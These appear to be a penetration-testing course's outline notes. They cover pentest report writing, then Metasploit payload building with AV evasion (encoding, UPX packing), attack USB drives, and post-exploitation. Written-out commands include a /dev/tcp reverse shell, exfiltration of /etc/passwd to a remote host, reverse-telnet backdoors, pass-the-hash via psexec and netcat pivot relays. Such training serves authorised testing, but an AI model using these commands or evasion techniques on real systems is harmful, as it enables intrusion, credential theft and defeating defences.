561

561
- 561: Maximizing the effectiveness of Reports, Exploits, and Command Shells
- (back to top)
- Intro
  - in 560, everything works
  - in 561, more experimental
    - new to Metaploit framework
    - may not work 100%
  - report writing workshop
- Reports
  - exec summary
    - systematic failure
      - patch process failing?
      - systems not following build procedures?
    - focus on business aspects
      - how to remedy with mgt action?
      - enough detail to support mgt decisions
      - context of risk, now technology
        PII
        credit card numbers
    - contents
      - a little about scope
      - narrative
        what really happened
      - how measured
        details
      - findings
        why important?
        what is the risk?
        each finding is an argument for action
        description of tool or setting, "not needed for business purposes", why risky, recommendation
      - solution at end
      - self-contained
  - detail section
    - SOYA
      - spell out your acronyms
      - sound sarcastic
      - talking over audience's heads
      - first use in each ection should be spelled out because report may be sliced up
    - assume audientce is technical, but not pentestes themselves
    - balance between too technical and too basic
  - problem: criticize example report
    - exec summary
      - using tech terms
        subnets: what does that mean in relation to the scope?
      - says nothing of systematic issues. All solutions are point solutions
      - "focused on servers and their related systems"
        which systems?
      - no nararrative about how PII was accessed
      - sounds cranky, no positive recommendations
        what efforts are successful and should be continued
      - how pervasive were the flaws found? what do the existence of the flaws indicate systemically?
      - no indication of which one is most serious
        actions
        priorities
      - missing
        1. restrict services to those that serve a business pupose
        2. improve patching process
    - introduction
      - fuzzy definition of subnets tested
      - how were internal networks tested via Internet
        turns out to be an artifact of the class avoiding the 837-5309 problem
      - scope and dates should have been separate section
      - DoS mentioned twice. Why?
        Second time, tester is compaining about test not being allowed.
    - methodology
      - all general statements, not anything about what was done
      - no mention of what tools were used
        how can we retest in the same manner to confirm remediation was successful?
      - no mention of techniques, just tools
      - harping on DoS tests not being performed again
    - findings
      - high, med, low risk is only measure
      - no mention of what tools were used
      - how hard to fix?
      - how much does each finding impact the business? That is the correct measure of risk.
      - each risk category should be it's own section
      - 4.1.1
        what is GUI? what is VNC?
        summary does not say what the problem is
        did they exploit VNC, or just find it listening?
        if it had been exploited, what could an attacker have done?
        keep going, access other systems,etc.
      - 4.1.2
        Weak passwords on VNC
      - 4.1.3
        Apply Windows Patch
        bad title
        cut and paste info
      - 4.2.1
        got some access, could not get further, hence only "medium"
        should have been "high" because someone with more time could have gotten in
        no mention that patching process is failure
      - 4.2.2
        what is an "excessive port"?
  - recommend
    - write to target audience
    - convey a message that has a real impact
    - hire a tech writer
    - better reports trump better technical prowess
- Metasploit
  - Title: Building, encoding, and Using Metaploit payloads
  - goals
    - bypass AV
    - bypass IDS
  - steps
    - 1. build evil exe
      - msfpayload
        takes a payload and makes one of:
        X - standalone exe
        C - C code
        P - Perl
        J - .js to download and execute
        R - generate raw bytes
        vbscript (for office macros)
        Office doc compromises a machine as soon as opened
        ./msfpayload windows/shell_reverse_tcp LPORT=3333.... X > filename.exe
        Check the length. If under 100 bytes, probably did not work
        Choice or port affects detection by AV engines.
        55555, 66666, etc. more detectable
        try at virustotal
        as soon as executed
        reverse shell (to our nc listener)
        but may crash
        1 in 10 WIndows systems more likely to crash
        Why reverse shell?
        more likely to be allowed outbound by firewall than inbound bind_tcp shell
        use a port like 80 or 443
        phones home, no need for attacker to know the victim IP
        Any metaploit payload?
        fancier payloads tend to be buggy
        meterpreter
        VNC
        shell is enough anyway
        shell_bind_tcp
        shell_reverse_tcp
        dark operator
        carlos perez
        most AV only look at first 150 bytes
        padding helps avoid AV detection
    - 2. encode evil exe
      - msfencode
        encode the payload
        many IDS detect payload, not exploit
        see slide 14
        show encoders
        set ENCODER [type]
        ./msfencode -l -a x86
        to list possibilities
        -a [processor]
        x86
        x/86/shikata_ga_nai
        after WW2, we thought Japs would fight until the end
        but Jap populace decided "we've lost, there's nothing more that can be done"
        output
        -t raw
        mark baggett
        articles, modify Ruby code to make encoding more stable
        see his blog
        g mark baggett metasploit
        3 rounds of encoding, and still runs
        slide 17 ff. has the steps to encode
        encoded payload can be reused in msf
    - 3. further alter exe
      - upx packer
        easier way to dodge detection
        also used by legit developers to protect their intell. proprety
        some AV detect, some do not
        can pack an .exe
        can even pack a .dll
        instructor's favories> -2 -7
        upx.exe -force -o exename.exe inputexe.exe
        -force because UPX is whiny
    - 4. weaponize exe
      - universal customizer and USB token
    - exercise: create attack USB thumbdrive
      - start slide 33
      - also create an attack ipod touch: more likely for exec to hook it up
      - must be a U3 device
        behave like a CDROM
        can field strip, put in a non-U3 device case (!)
        or scrape off "U3" logo
        policy
        will never insert a U3 device
      - install universalcustomizer
        creates U3custom.iso in its BIN folder
    - Lunch break
  - search
  - pivot
  - psexec
  - pass-the-hash
- Post-exploitation without netcat
  - netcat is not always installed or available
  - What do you do?
    - Mike Poor: easy, get nc and put it there
  - Uses for netcat
    - connect to arbitrary open ports
      - telnet
      - /dev/tcp
    - scan ports
      - wrap the above in scripts
    - send files
    - implement backdoor shell
    - build relays
    - more
  - versions
    - original by Hobbit
    - socat
      - John's favorite
    - cryptcat
    - linkcat
      - Dan Kaminsky
      - arbitrary frame injection
    - nc.py
    - perlcal
      - by Atlas
      - currently still a work in progress
    - IOScat
  - Why not just netcat?
    - not installed
    - Rules of Engagement prohibit installation of tools
    - HIPS prevents it
      - bit9
    - AV tools blocking nc
    - maybe we don't even need it
  - best practices
    - install no tools, use built-in
      - if it crashes system, no flack
      - not detected by AV
      - safer
  - goals
    - backdoor shell
    - file transfer
    - port scanner
  - our parameters
    - Focus on TCP not UDP
      - easier
      - more built in tools
    - Use arbitrary ports
      - adapt to firewalls
    - Linux first
      - easier
      - then Windows
  - Linux
    - /dev/tcp
      - don't need root to use it
      - /dev/tcp/[ip]/[port]
      - not on Debian distros
        no /dev/tcp
        only Fedora, Red Hat has it
    - file xfer
      - cat /etc/passwd > /dev/tcp/1.2.3.4/333
      - catch with nc listener
    - command line backdoor
      - /dev/tcp
        /bin/bash -i > /dev/tcp/[ip]/[port] 0<&1 2>&1
        ampersands before 1s because listed more than once
        also can redir into sclient and send to remote SSH listeneer
      - "reverse telnet"
        if debian, for instance
        2 outgoing telnets!
        victim$ telnet [attackerIP] {port1 | /bin/bash | telnet [attackerIPaddr] [port2]
        attacker$ nc -l -p 2222
        attacker$ nc -l -p 3333
    - portscan
      - /dev/tcp
        echo > /dev/tcp/[IP]/[port]
        see slide 19
        see if "connection refused". If so, port is closed
        exit status = 1
        If port open, no error
        because Linux systems don't brag
        exit status = 0
        port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/[IP]/$port; [ $? == 0 ] && echo $port "is open >> /tmp/ports.txt; port=`expr $port + 1'; done
      - telnet
        see slide 21
  - Windows
    - building blocks
      - for /L %i (start, step, stop) do [command]
        a counter
        %i will never reach stop
      - telnet
        hideous
        hangs on an open port
        no errorlevel
        no logging
        not installed on Vista (by default)
        pkgmgr /iu: "TelnetClient"
        or install telnet server with /uu instead of /iu
      - ftp
        open [ip] [port]
        ftp can read from a response file with -s
    - portscanner
      - for /L %i in (1,1,1024) do echo open [IP] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt
      - hangs for 15 seconds on open port, then moves on
        actually, good: this is stealthy and may fool IDS
      - does not store results
      - ugly workround to store results: see slide 29
    - file xfer
      - type file >> \\machine\share\filename
      - Use net use session to mount remote drive if credentials needed
      - use copy or move also
      - echo hello >> \\1.2.3.4\temp\file.txt
    - command shell
      - the "file shell" backdoor
        "for" command with '^' as delimiter
        see slide
        it loops every second; if no commands.txt it loops again
        ping command to slow it down
        feed it commands to write to commands.txt
        read results by using type to read output.txt
        Samba works great for the two above functions
      - other ways
        use FTP to transfer files back and forth
        retrieve command as PTR record, etc.
        then return result as an A record lookup
  - exercise slide 36
    - note: NTLMv1 must be enabled on Windows for Samba to work
- Additional Metasploit features
  - additional handout, page numbering starts with 4-1
  - often system we are trying to access is not the one weh just exploited, but one a few hops away
  - Metasploit 3.1 search command
    - all
    - specific service
    - payloads
    - exploits
  - Route command
    - compromizing a system
    - pretend that we are at victim1
    - set RHOST victim2
    - exploit
      - not msf will automatically laugh the exploit from victim1
    - exploit victim1
      - use exploit
      - set PAYLOAD, LPORT
      - set RHOST victim1IP
      - exploit
      - crtl-Z to bg the meterpreter session
    - exploit victim2 via victim1
      - route add victim2subnet netmask session#
      - route print
      - set RHOST victim2IP
      - exploit
      - traffic goes from victim1 to victim2
  - psexec to launch
    - as if on victim1 (again)
    - see slide 4-7
    - but we don't have admin necessarily
    - integrated pass-the-hash
      - do meterpreter's hashdump on victim1
      - use windows/smb/psexec
      - set SMBPass adminLMhash:adminNThash
      - set SMBUser Administrator
      - exploit
      - slide 4-8
    - problem: psexec is multithreaded, meterpreter is not
      - so only stable for 30 seconds
  - exercise slide 4-10
    - exploit 10.10.10.10
      - meterpreter as payload
      - route command for 10.10.10.20
    - pivot to 10.10.10.20
      - tcpdump on 10.10.10.20 would only show traffic from 10.10.10.10; none from you!
- Flexible Linux pivots
  - metasploit route might crash too much
  - very common:
    - compromise system on DMZ
    - get shell on that system
    - use netcat relay
  - firewall blocks port 445 dst on DMZ
  - netcat gender bender relay
    - start from our Windows system
      - cannot attck DMZ WIndows usinf fgdump thru firewall
    - our Linux system
      - our system, listen on 445, nc to port 80 on DMZ victim1
        a universal joint
      - mknod backpipe1
      - nc -nvlp 445 0<backpipe1 | nc -nvlp 80 | tee backpipe1
      - or
      - nc -nvlp 445 0<backpipe1 | nc -nvlp 80 > backpipe1
    - DMZ Linux system
      - mknod backpipe2
      - connect to DMZ Windows system on 445
      - nc -nv DMZ-W 445 0<backpipe2 | nc -nv ourLinux 80 | tee backpipe2
      - or
      - nc -nv DMZ-W 445 0<backpipe2 | nc -nv ourLinux 80 > backpipe2
    - Quickly!
      - run fgdump through our system through DMZ L to DMZ W
      - or net use
      - net use * \\ourLinux\c$ password /u:Administrator
      - must be done fast, as once DMZ-L connects to DMZ-W on 445, DMZ_W will not wait long for an SMB connection.
    - exercise